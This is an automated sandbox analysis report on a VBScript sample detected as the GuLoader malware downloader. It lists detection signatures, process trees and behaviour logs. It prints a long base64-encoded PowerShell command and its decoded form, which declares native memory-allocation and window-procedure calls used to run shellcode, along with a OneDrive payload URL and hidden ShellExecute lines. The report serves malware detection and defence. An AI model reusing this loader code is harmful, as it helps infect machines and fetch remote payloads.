Windows Analysis Report
IMG 0045434.vbs

Overview

General Information

Sample Name: IMG 0045434.vbs
Analysis ID: 562140
MD5: 813117cdcd80979365fd6d9586d11e4a
SHA1: e28ef2705053405e87f440f078f31d13b09a9ee3
SHA256: 1def093ef16309c10c38b5426ac396019c4ddc074394b022626b8dce1ea2acaa
Tags: vbs

Detection

GuLoader
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 6892 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 5400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" "c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"Payload URL": "https://onedrive.live.com/download?cidO"}
Source: 00000003.00000002.1189973609.00000000098B0000.00000040.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

    System Summary

    Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
    Source: Process started, Author: frack113, Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
    Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5612, TargetFilename: C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline
    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
    Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132878514567671740.5612.DefaultAppDomain.powershell

    AV Detection

    Source: 00000003.00000002.1189973609.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cidO"}

    Networking

    Source: Initial file: D_Stream.SaveToFile Gefullte5, 2
    Source: Malware configuration extractor, URLs: https://onedrive.live.com/download?cidO
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000003.00000002.1180399057.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoAC
IAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAc
    Source: Initial file: obj1.ShellExecute MyFile , INTENS ,"","",0
    Source: Initial file: obj1.ShellExecute "powershell.exe", INTENS ,"","",0
    Source: C:\Windows\System32\wscript.exe, Process created: Commandline size = 7389
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_033CE7C8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_07E6BF18
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process Stats: CPU usage > 98%
    Source: IMG 0045434.vbs, Initial sample: Strings found which are bigger than 50
    Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\IMG 0045434.vbs"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" "c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP"
    Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\Documents\20220128
    Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\TRICA.dat
    Source: classification engine, Classification label: mal88.troj.evad.winVBS@8/11@0/0
    Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_01
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

    Data Obfuscation

    Source: C:\Windows\System32\wscript.exe, Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBiAHIAaQBjAGsAIABMA", "", "", "0")
    Source: Yara match, File source: 00000003.00000002.1189973609.00000000098B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_07E660A8 push eax; mov dword ptr [esp], edx (3_2_07E660BC)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, File created: C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.dll
    Source: C:\Windows\System32\wscript.exe, Registry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe    Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2912    Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe    Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 5373
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Window / User API: threadDelayed 2280
    Source: C:\Windows\System32\wscript.exe    Window found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process information queried: ProcessInformation
    Source: powershell.exe, 00000003.00000002.1182278498.000000000566A000.00000004.00000800.00020000.00000000.sdmp    Binary or memory string: Hyper-V
    Source: wscript.exe, 00000001.00000003.734411949.00000169969AF000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
    Source: powershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1182278498.000000000566A000.00000004.00000800.00020000.00000000.sdmp    Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\wscript.exe    Process created: Base64 decoded #brick Lillith Post8 Tactilesi RADICU Parrafoura Servbjer4 Buttwo8 ghent OMSK Songishmi3 CUPPERSDEX Srge9 Ingnu1 Kandelabr3 Saronic MIKEYNOTH NITRERIN TACK PIGPENB Betapart5 genioh Ugeskrif Beslagsm7 Nonpsych9 sensitiz Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Sludrech1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Sludrech6,ref Int32 VERSALERN,int Forbistrin,ref Int32 Sludrech,int Refrman,int Sludrech7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string Monstr,uint Melle8,int Nonpercep,int Sludrech0,int HABAN,int BAAN,int NRINGS);[DllImport("kernel32.dll")]public static extern int ReadFile(int Forbistrin0,uint Forbistrin1,IntPtr Forbistrin2,ref Int32 Forbistrin3,int Forbistrin4);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Forbistrin5,int Forbistrin6,int Forbistrin7,int Forbistrin8,int Forbistrin9);}"@#cisterci punkter Temu4 PATRONES Hestek UNREFO bekrans Pampr Genbru decer Crescent Thiasusi piltst Omsorgsce Prel6 barskabesn Metathe Televsnets6 Smals7 BOOSTERI mism PINS Tndehvl1 skriv Over unpropag Test-Path "Hild3" Test-Path "Pierid" $Sludrech3=0;$Sludrech9=1048576;$Sludrech8=[Sludrech1]::NtAllocateVirtualMemory(-1,[ref]$Sludrech3,0,[ref]$Sludrech9,12288,64)#sogne sang NYTVANC Rilletpro8 popular billedm lseproc constan Subte Ilsabet9 hulkynap bevrteren Sidevi Mast Ensom1 Underscale1 Trykker
    Source: C:\Windows\System32\wscript.exe    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" "c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\System32\wscript.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
